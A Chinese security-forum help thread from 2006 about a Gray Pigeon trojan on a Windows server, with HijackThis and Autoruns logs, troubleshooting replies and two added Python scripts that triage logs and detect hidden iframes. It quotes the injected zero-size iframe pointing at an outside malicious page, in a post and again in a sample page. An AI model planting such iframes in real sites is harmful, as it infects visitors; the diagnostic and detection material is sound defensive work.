Rising Kaka Security Forum (瑞星卡卡安全论坛)

[Help] Urgent: a Gray Pigeon (灰鸽子) that cannot be killed!! Experts, please help
青岛的好人 - 2006-1-19 16:09:00
My server has been infected with Gray Pigeon (灰鸽子). When I browse this server's web pages from another machine, the status bar shows the page connecting to http://web.163.sh.cn/~26360185/afu.htm. I asked about this virus before (around mid-November 2005); following a moderator's hint (I forget which one), I traced the other side's IP and blocked that IP range on the firewall, but today I found it had gotten through the firewall and come back in!
My scan log is as follows:
HijackThis_815汉化版扫描日志 V1.99.1
保存于      8:04:29, 日期 2005-11-16
操作系统:  Windows 2000 SP4 (WinNT 5.00.2195)
浏览器:    Internet Explorer v6.00 SP1 (6.00.2800.1106)

当前运行的进程:         
C:\WINNT\System32\smss.exe
C:\WINNT\system32\winlogon.exe
C:\WINNT\system32\services.exe
C:\WINNT\system32\lsass.exe
C:\WINNT\system32\svchost.exe
C:\WINNT\system32\spoolsv.exe
C:\Program Files\NavNT\defwatch.exe
C:\WINNT\System32\svchost.exe
C:\WINNT\System32\ibmasrex.exe
C:\WINNT\System32\IBMHPASV.EXE
C:\WINNT\System32\ibmsmbus.exe
C:\WINNT\System32\llssrv.exe
C:\Program Files\NavNT\rtvscan.exe
C:\WINNT\system32\regsvc.exe
C:\WINNT\system32\MSTask.exe
C:\Program Files\System Safety Monitor\SSMService.exe
C:\WINNT\System32\WBEM\WinMgmt.exe
C:\WINNT\system32\svchost.exe
C:\WINNT\System32\inetsrv\inetinfo.exe
C:\WINNT\System32\msdtc.exe
C:\WINNT\system32\Dfssvc.exe
C:\Program Files\System Safety Monitor\sysSafe.exe
C:\WINNT\Explorer.EXE
C:\WINNT\system32\Atiptaxx.exe
C:\Program Files\NavNT\vptray.exe
C:\WINNT\system32\internat.exe
C:\WINNT\System32\svchost.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\WINNT\System32\mdm.exe
C:\Program Files\Internet Explorer\IEXPLORE.EXE
C:\Documents and Settings\Administrator\桌面\HijackThis1991zww.exe

O4 - 启动项HKLM\\Run: [AtiPTA] Atiptaxx.exe
O4 - 启动项HKLM\\Run: [vptray] C:\Program Files\NavNT\vptray.exe
O4 - 启动项HKLM\\Run: [MS-4011 Memory Patch] C:\Documents and Settings\Administrator\桌面\RavSasser.exe -Patch
O4 - HKCU\..\Run: [Internat.exe] internat.exe
O17 - HKLM\System\CCS\Services\Tcpip\..\{24BA6A74-0200-4D4F-925A-66EE4B8E8833}: NameServer = 218.58.74.240,218.56.57.58
O17 - HKLM\System\CS1\Services\Tcpip\..\{24BA6A74-0200-4D4F-925A-66EE4B8E8833}: NameServer = 218.58.74.240,218.56.57.58
O17 - HKLM\System\CS2\Services\Tcpip\..\{24BA6A74-0200-4D4F-925A-66EE4B8E8833}: NameServer = 218.58.74.240,218.56.57.58
O20 - Winlogon Notify: NavLogon - C:\WINNT\system32\NavLogon.dll
O20 - Winlogon Notify: System Safety Monitor - C:\WINNT\SYSTEM32\SSMWinlogonEx.dll
O23 - NT 服务: DefWatch - Symantec Corporation - C:\Program Files\NavNT\defwatch.exe
O23 - NT 服务: Logical Disk Manager Administrative Service (dmadmin) - VERITAS Software Corp. - C:\WINNT\System32\dmadmin.exe
O23 - NT 服务: IBM Automatic Server Restart Executable (ibmasrex) - Unknown owner - C:\WINNT\System32\ibmasrex.exe
O23 - NT 服务: IBM Active PCI Alert Service (IBMHPS) - IBM Corporation - C:\WINNT\System32\IBMHPASV.EXE
O23 - NT 服务: SMBus Upgrade Service for Windows 2000 and above (ibmsmbus) - International Business Machines Corp. - C:\WINNT\System32\ibmsmbus.exe
O23 - NT 服务: Norton AntiVirus 客户端 (Norton AntiVirus Server) - Symantec Corporation - C:\Program Files\NavNT\rtvscan.exe
O23 - NT 服务: System Safety Monitor (SSM) - System Safety - C:\Program Files\System Safety Monitor\SSMService.exe

Above is the scan log from my server. Would some kind soul take a look and tell me how to fix this? It is really worrying. Thank you!!!
青岛的好人 - 2006-1-19 16:19:00
Would some expert please take a look? I'm waiting online.
chirdren - 2006-1-19 16:22:00
I have the same problem as him. It seems everyone who installed Street Basketball (街头篮球) has this; sweat~~~ Boss, please take a look at my log too, thanks~~~
HijackThis_zww汉化版扫描日志 V1.99.1
保存于      16:18:16, 日期 2006-1-19
操作系统:  Windows XP SP2 (WinNT 5.01.2600)
浏览器:    Internet Explorer v6.00 SP2 (6.00.2900.2180)

当前运行的进程:         
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
f:\Program Files\Rising\Rav\CCenter.exe
C:\WINDOWS\System32\svchost.exe
f:\Program Files\Rising\Rav\Ravmond.exe
f:\program files\rising\rfw\rfwproxy.exe
C:\WINDOWS\Explorer.EXE
f:\program files\rising\rfw\rfwsrv.exe
f:\Program Files\Rising\Rav\RavStub.exe
C:\WINDOWS\system32\spoolsv.exe
f:\program files\rising\rfw\RfwMain.exe
C:\WINDOWS\system32\nvsvc32.exe
F:\Program Files\Rising\Rav\RavTask.exe
F:\Program Files\Rising\Rav\Ravmon.exe
C:\WINDOWS\system32\RUNDLL32.EXE
C:\WINDOWS\system32\ctfmon.exe
C:\WINDOWS\system32\wscntfy.exe
C:\Program Files\Internet Explorer\iexplore.exe
f:\Program Files\Thunder Network\Thunder\Thunder.exe
G:\TDdownload\2535952005811174944\HijackThis1991zww.exe

O2 - BHO: ThunderIEHelper - {0005A87D-D626-4B3A-84F9-1D9571695F55} - C:\WINDOWS\system32\xunleibho_v11.dll
O4 - 启动项HKLM\\Run: [IMJPMIG8.1] "C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE" /Spoil /RemAdvDef /Migration32
O4 - 启动项HKLM\\Run: [PHIME2002ASync] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /SYNC
O4 - 启动项HKLM\\Run: [PHIME2002A] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /IMEName
O4 - 启动项HKLM\\Run: [RfwMain] "f:\Program Files\Rising\Rfw\rfwmain.exe" -Startup
O4 - 启动项HKLM\\Run: [RavTask] "f:\Program Files\Rising\Rav\RavTask.exe" -system
O4 - 启动项HKLM\\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
O4 - 启动项HKLM\\Run: [nwiz] nwiz.exe /install
O4 - 启动项HKLM\\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\system32\NvMcTray.dll,NvTaskbarInit
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O8 - IE右键菜单中的新增项目: &使用迅雷下载 - f:\Program Files\Thunder Network\Thunder\geturl.htm
O8 - IE右键菜单中的新增项目: &使用迅雷下载全部链接 - f:\Program Files\Thunder Network\Thunder\getallurl.htm
O9 - 浏览器额外的按钮: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - 浏览器额外的“工具”菜单项: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O17 - HKLM\System\CCS\Services\Tcpip\..\{433377B8-4B33-4DA2-AE5A-4EFE346C11C9}: NameServer = 218.30.19.40 61.134.1.4
O17 - HKLM\System\CS1\Services\Tcpip\..\{433377B8-4B33-4DA2-AE5A-4EFE346C11C9}: NameServer = 218.30.19.40 61.134.1.4
O23 - NT 服务: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe
O23 - NT 服务: Rising Proxy  Service (RfwProxySrv) - Beijing Rising Technology Co., Ltd. - f:\program files\rising\rfw\rfwproxy.exe
O23 - NT 服务: Rising Personal Firewall Service (RfwService) - Beijing Rising Technology Co., Ltd. - f:\program files\rising\rfw\rfwsrv.exe
O23 - NT 服务: Rising Process Communication Center (RsCCenter) - Beijing Rising Technology Co., Ltd. - f:\Program Files\Rising\Rav\CCenter.exe
O23 - NT 服务: RsRavMon Service (RsRavMon) - Beijing Rising Technology Co., Ltd. - f:\Program Files\Rising\Rav\Ravmond.exe

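Both HijackThis logs in this thread list autostart entries (O4) and DNS settings (O17), and the question in each case is which lines deserve a second look. The following triage script is an added example, not code from this thread or from HijackThis; it parses lines in the posted log format and flags autostart images that run from user-writable folders (the Desktop path 桌面 and "Documents and Settings" seen above) or as a bare file name, and O17 NameServer values that are not on a trusted list the administrator supplies. The sample O4/O17 lines are reproduced from the logs posted above; the "updater" line is constructed, and the list of user-writable path fragments is a heuristic assumption.

```python
import re

# Sample input in HijackThis log format: the O4/O17 lines are reproduced from the
# logs posted in this thread; the "updater" line is constructed to show a quoted
# command line with arguments. Raw string so the backslashes stay as logged.
SAMPLE_LOG = r"""O4 - 启动项HKLM\\Run: [AtiPTA] Atiptaxx.exe
O4 - 启动项HKLM\\Run: [vptray] C:\Program Files\NavNT\vptray.exe
O4 - 启动项HKLM\\Run: [MS-4011 Memory Patch] C:\Documents and Settings\Administrator\桌面\RavSasser.exe -Patch
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [updater] "C:\Documents and Settings\user\Local Settings\Temp\update.exe" /silent
O17 - HKLM\System\CCS\Services\Tcpip\..\{24BA6A74-0200-4D4F-925A-66EE4B8E8833}: NameServer = 218.58.74.240,218.56.57.58
"""

# HijackThis line shapes; the localized label before the registry key varies by
# build, so the key is matched as "anything non-blank up to the colon".
O4_RE = re.compile(r"^O4 - (?P<key>\S+): \[(?P<name>[^\]]+)\] (?P<cmd>.*)$")
O17_RE = re.compile(r"^O17 - .*NameServer = (?P<servers>[\d.,\s]+)$")

# Path fragments an ordinary user account can write to (heuristic assumption,
# compared lower-case); 桌面 is the localized Desktop folder seen in the posted log.
USER_WRITABLE = ("\\documents and settings\\", "\\users\\", "\\temp\\",
                 "\\桌面\\", "\\desktop\\", "\\appdata\\")


def image_path(cmd):
    """Extract the executable from an O4 command line ('"path" args' or 'path args')."""
    cmd = cmd.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        return cmd[1:end] if end > 0 else cmd[1:]
    # Unquoted paths may contain spaces, so cut at the first ".exe" token boundary.
    m = re.match(r"(.*?\.exe)(?:\s|$)", cmd, re.IGNORECASE)
    return m.group(1) if m else cmd.split()[0]


def triage(log_text, trusted_dns=()):
    """Return [(entry, reason), ...] for log lines that deserve a closer look."""
    findings = []
    for line in log_text.splitlines():
        m = O4_RE.match(line)
        if m:
            path = image_path(m.group("cmd"))
            low = path.lower()
            if "\\" not in path:
                findings.append((m.group("name"),
                                 "bare file name %s, resolved through the search path" % path))
            elif any(marker in low for marker in USER_WRITABLE):
                findings.append((m.group("name"),
                                 "autostart image in a user-writable location: %s" % path))
            continue
        m = O17_RE.match(line)
        if m:
            servers = [s for s in re.split(r"[,\s]+", m.group("servers").strip()) if s]
            unknown = [s for s in servers if s not in trusted_dns]
            if unknown:
                findings.append(("NameServer",
                                 "uses DNS server(s) not on the trusted list: %s" % ", ".join(unknown)))
    return findings


if __name__ == "__main__":
    # trusted_dns is whatever resolvers the administrator actually configured
    for entry, reason in triage(SAMPLE_LOG, trusted_dns=("218.58.74.240",)):
        print("[%s] %s" % (entry, reason))
```

A flagged line is a starting point, not a verdict: an image under the Desktop folder may be a tool the administrator placed there (as the posted log suggests), so each hit still needs the file's publisher and signature checked before anything is removed.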
帅的被贼砍 - 2006-1-19 16:27:00
What is the path of the virus?
青岛的好人 - 2006-1-19 16:32:00
I don't know; there is no path. If I knew it, I would have deleted it already. Thank you!
青岛的好人 - 2006-1-19 16:34:00
It writes something like this into the source of the web pages: <iframe src="http://web.163.sh.cn/~26360185/afu.htm" name="zhu" width="0" height="0" frameborder="0">, and the part after <iframe src="http://web.163.sh.cn/ may be different each time. I guess it is being written in through remote control.
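The injection described in this post is an invisible iframe (width and height 0) that points at an outside host, so the quickest way to learn which files on the server currently carry it is to scan the web root for iframes that are hidden or load foreign content. The scanner below is an added example, not the poster's code or any tool from the thread; it parses HTML with the standard library only, never fetches the iframe targets, and reports each suspicious iframe with the reason. The sample page is constructed; the file extensions scanned and the own_hosts list (hostnames that legitimately belong to the site) are assumptions the administrator adjusts.

```python
import os
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page (not from the thread): one ordinary same-site iframe,
# one zero-size iframe of the kind described in the post, one hidden by CSS,
# and one visible iframe that pulls content from another host.
SAMPLE_HTML = """<html><body>
<h1>Welcome</h1>
<iframe src="/video.html" width="640" height="480"></iframe>
<iframe src="http://web.163.sh.cn/~26360185/afu.htm" name="zhu" width="0" height="0" frameborder="0"></iframe>
<iframe src="http://ads.example.invalid/x.htm" style="display: none"></iframe>
<iframe src="http://partner.example.invalid/widget.htm" width="300" height="250"></iframe>
</body></html>"""


class IframeCollector(HTMLParser):
    """Collects the attributes of every <iframe> tag; nothing is rendered or fetched."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _pixels(value):
    """'0', '0px', ' 640 ' -> int; anything else (percentages, empty) -> None."""
    m = re.match(r"\s*(\d+)\s*(px)?\s*$", value)
    return int(m.group(1)) if m else None


def hidden_reason(attrs):
    """Why an iframe would be invisible to the visitor, or None if it looks visible."""
    w, h = _pixels(attrs.get("width", "")), _pixels(attrs.get("height", ""))
    if w is not None and h is not None and (w <= 1 or h <= 1):
        return "zero/one-pixel size (width=%d height=%d)" % (w, h)
    style = attrs.get("style", "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return "hidden by inline CSS"
    return None


def find_hidden_iframes(html, own_hosts=()):
    """Return [(src, reason), ...] for iframes that are hidden or point off-site.

    own_hosts: hostnames that legitimately belong to this site (assumption supplied
    by the administrator); a visible iframe on any other host is reported too.
    """
    parser = IframeCollector()
    parser.feed(html)
    findings = []
    for attrs in parser.iframes:
        src = attrs.get("src", "")
        reason = hidden_reason(attrs)
        host = urlparse(src).hostname
        if reason is None and host and host not in own_hosts:
            reason = "loads content from foreign host %s" % host
        if reason is not None:
            findings.append((src, reason))
    return findings


def scan_webroot(root, own_hosts=(), exts=(".htm", ".html", ".asp", ".php", ".shtml")):
    """Walk a web root and map each file with suspicious iframes to its findings."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = find_hidden_iframes(fh.read(), own_hosts)
                if hits:
                    report[path] = hits
    return report


if __name__ == "__main__":
    for src, why in find_hidden_iframes(SAMPLE_HTML, own_hosts=("www.example.invalid",)):
        print("SUSPICIOUS iframe -> %s (%s)" % (src, why))
```

Run scan_webroot against the server's document root to get the list of files to clean; because the poster reports that the src changes each time, the files it names are also the ones whose write permissions and modification times are worth reviewing. The scan identifies modified pages, not the process that modifies them.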
青岛的好人 - 2006-1-19 16:36:00
Experts, I'm begging you, please help.
帅的被贼砍 - 2006-1-19 16:38:00
It may be hidden.. Run a scan with SREng and post the log so baohe and 不言放弃 can take a look... that one makes my eyes blur.
青岛的好人 - 2006-1-19 16:40:00
What is that? Can you tell me where I can download it?
青岛的好人 - 2006-1-19 16:57:00
Nobody's helping? So pitiful, so heartbreaking! 55555555555555~~~~~~~~~~~~~~~
BlackStone - 2006-1-19 17:09:00
Save a log with Autoruns and post it here.
How to save the log: choose the File->Save menu item.
When saving the log, be sure to select the Options->Hide Microsoft Entries menu item (after setting this, click the refresh button on the toolbar).

For downloading and using the tool, see http://forum.ikaka.com/topic.asp?board=28&artid=7318038
青岛的好人 - 2006-1-20 10:28:00
Thank you very much. The log is below; I can't make sense of it. Please take a look for me, thanks.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
+ AtiPTA | ATI Desktop Control Panel | ATI Technologies, Inc. | c:\winnt\system32\atiptaxx.exe
+ vptray | Norton AntiVirus | Symantec Corporation | c:\program files\navnt\vptray.exe

HKLM\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved
+ Display Panning CPL Extension | File not found: deskpan.dll
+ HyperTerminal Icon Ext | HyperTerminal Applet Library | Hilgraeve, Inc. | c:\winnt\system32\hticons.dll
+ LDVP Shell Extensions | Norton AntiVirus | Symantec Corporation | c:\program files\common files\symantec shared\ssc\vpshell2.dll
+ WinRAR shell extension | c:\program files\winrar\rarext.dll

HKLM\System\CurrentControlSet\Services
+ DefWatch | Virus Definition Daemon | Symantec Corporation | c:\program files\navnt\defwatch.exe
+ ibmasrex | IBM | c:\winnt\system32\ibmasrex.exe
+ IBMHPS | IBM Active PCI Alert Service | IBM Corporation | c:\winnt\system32\ibmhpasv.exe
+ ibmsmbus | SMBus Upgrade Service for Windows 2000 and above | International Business Machines Corp. | c:\winnt\system32\ibmsmbus.exe
+ Norton AntiVirus Server | Norton AntiVirus | Symantec Corporation | c:\program files\navnt\rtvscan.exe

HKLM\System\CurrentControlSet\Services
+ ati2mpad | ATI2MPAD Miniport Driver | ATI Technologies Inc. | c:\winnt\system32\drivers\ati2mpad.sys
+ atirage3 | ATIRAGE3 Miniport Driver | ATI Technologies Inc. | c:\winnt\system32\drivers\atimpab.sys
+ b57w2k | Broadcom NetXtreme Gigabit Ethernet NDIS5 Driver. | Broadcom Corporation | c:\winnt\system32\drivers\b57w2k.sys
+ dmio | NT Disk Manager I/O Driver | VERITAS Software Corp. | c:\winnt\system32\drivers\dmio.sys
+ dmload | NT Disk Manager Startup Driver | VERITAS Software Corp. | c:\winnt\system32\drivers\dmload.sys
+ GENERICSMB | SMBus Generic Device driver for Windows 9x/2K? | International Business Machines Corp. | c:\winnt\system32\drivers\smbgen.sys
+ IBMHPA | IBM Active PCI Alert Driver | IBM Corporation | c:\winnt\system32\drivers\ibmhpa.sys
+ IBMHPF | IBM Active PCI Filter Driver | IBM Corporation | c:\winnt\system32\drivers\ibmhpf.sys
+ NAVAP | c:\program files\navnt\navap.sys
+ NAVAPEL | c:\program files\navnt\navapel.sys
+ nfrd960 | IBM ServeRAID Controller Driver | IBM Corporation | c:\winnt\system32\drivers\nfrd960.sys
+ Ptilink | Direct Parallel Link Driver | Parallel Technologies, Inc. | c:\winnt\system32\drivers\ptilink.sys
+ safemon | System Safety Monitor 2.0 extension for Windows security layer | System Safety Limited | c:\winnt\system32\drivers\safemon.sys
+ SMBusDH | SMB Device Hub Controller driver for Windows 9x/2K? | International Business Machines Corp. | c:\winnt\system32\drivers\smbusdh.sys
+ SMBusHC | SMB Host Controller driver for Windows 9x/2K? | International Business Machines Corp. | c:\winnt\system32\drivers\smbushc.sys
+ SymEvent | Symantec Event Library | Symantec Corporation | c:\program files\symantec\symevent.sys

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify
+ NavLogon | c:\winnt\system32\navlogon.dll
+ System Safety Monitor | System Safety Winlogon Notification | System Safety Limited | c:\winnt\system32\ssmwinlogonex.dll

BlackStone - 2006-1-20 10:39:00
I can't see a startup entry that matches the problem you posted.

+ ibmasrex | IBM | c:\winnt\system32\ibmasrex.exe
Confirm whether this one is really IBM's. If it is not:
delete the startup entry,
reboot,
then delete the file.
